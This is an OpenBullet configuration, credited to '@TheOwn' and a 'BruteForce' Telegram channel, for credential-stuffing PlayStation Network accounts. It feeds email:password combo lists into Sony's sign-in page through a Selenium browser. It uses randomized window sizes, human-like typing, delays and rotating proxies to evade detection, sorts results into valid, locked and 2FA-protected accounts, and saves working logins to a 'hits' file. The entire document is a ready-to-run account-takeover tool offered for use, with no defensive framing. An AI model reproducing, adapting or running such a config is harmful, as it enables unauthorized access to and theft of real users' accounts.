[SETTINGS]
{
  "Name": "PSN Selenium V4",
  "SuggestedBots": 10,
  "MaxCPM": 0,
  "LastModified": "2020-09-29T02:55:59.7610546+03:30",
  "AdditionalInfo": "Telegram Channel: @BruteForce | Need HQ Proxy | Max Bot: 10 | You Should install Chorme Driver | Run Just OB 1.2.2 ",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": true,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": true,
  "AlwaysQuit": false,
  "QuitOnBanRetry": true,
  "DisableNotifications": false,
  "CustomUserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#OPEN BROWSERACTION Open 

NAVIGATE "https://id.sonyentertainmentnetwork.com/id/tv/signin/?/signin#/signin" 

#KIR FUNCTION RandomNum "540" "850" -> VAR "KIR" 

#Set BROWSERACTION SetWidth "<KIR>" 

#RRR FUNCTION RandomNum "892" "1354" -> VAR "RRR" 

#Delay FUNCTION Delay "<RRR>" -> VAR "Delay" 

#Click ELEMENTACTION XPath "//*[@id=\"ember14\"]" 
  Click 

#Send ELEMENTACTION XPath "//*[@id=\"ember14\"]" 
  SendKeysHuman "<USER>" 

#RRRR FUNCTION RandomNum "892" "1354" -> VAR "RRRR" 

#Delay FUNCTION Delay "<RRRR>" -> VAR "Delay" 

#Click ELEMENTACTION XPath "//*[@id=\"ember17\"]" 
  Click 

#SendP ELEMENTACTION XPath "//*[@id=\"ember17\"]" 
  SendKeysHuman "<PASS>" 

#RRRRR FUNCTION RandomNum "892" "1354" -> VAR "RRRRR" 

#Delay FUNCTION Delay "<RRRRR>" -> VAR "Delay" 

#Enter BROWSERACTION SendKeys "<ENTER>" 

#Delay FUNCTION Delay "500" -> VAR "Delay" 

#Wait ELEMENTACTION Id "" 
  WaitForElement "3s" 

#DOM BROWSERACTION DOMtoSOURCE 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "An error occurred during communication with the server." 
  KEYCHAIN Failure OR 
    KEY "The sign-in ID (email address) or password is not correct." 
  KEYCHAIN Ban OR 
    KEY "The connection to the server timed out." 
    KEY "A connection to the server could not be established." 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Either your account has been locked due to multiple failed sign-in attempts, or your password needs to be reset due to security reasons." 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "2-step verification is enabled." 

#Save UTILITY File "PSN Hits.txt" AppendLines "<<<<<<<<Accounts>>>>>>>\\nUser: <USER>\\nPass: <PASS>\\n\\n\\nConfiged By: @TheOwn\\nTelegram Channel: T.me/BruteForce\\n=====================================" -> VAR "Save" 

